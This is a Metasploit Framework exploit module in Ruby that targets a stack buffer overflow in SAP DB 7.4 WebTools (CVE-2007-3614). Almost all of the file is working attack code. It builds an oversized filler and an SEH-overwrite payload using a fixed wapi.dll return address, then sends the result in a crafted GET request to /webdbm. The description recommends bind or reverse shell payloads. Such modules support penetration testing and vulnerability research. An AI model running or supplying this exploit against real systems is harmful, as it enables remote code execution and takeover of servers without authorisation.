metasploit-framework/modules/exploits/windows/http/sapdb_webtools.rb

82 lines
2.1 KiB
Ruby

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP DB 7.4 WebTools Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.
By sending an overly long GET request, it may be possible for
an attacker to execute arbitrary code. Using the PAYLOAD of
windows/shell_bind_tcp or windows/shell_reverse_tcp allows
for the most reliable results.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-3614' ],
[ 'OSVDB', '37838' ],
[ 'BID', '24773' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 850,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
},
'Platform' => 'win',
'Targets' =>
[
[ 'SAP DB 7.4 WebTools', { 'Ret' => 0x1003c95a } ], # wapi.dll 7.4.3.0
],
'DisclosureDate' => 'July 5 2007',
'DefaultTarget' => 0))
register_options( [ Opt::RPORT(9999) ], self.class )
end
def exploit
c = connect
filler = rand_text_alphanumeric(20774)
seh = generate_seh_payload(target.ret)
# pretty big...
sploit = filler + seh + rand_text_alphanumeric(3000)
print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)
res = send_request_raw({
'uri' => '/webdbm',
'query' => 'Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=' + sploit
}, 5)
handler
end
end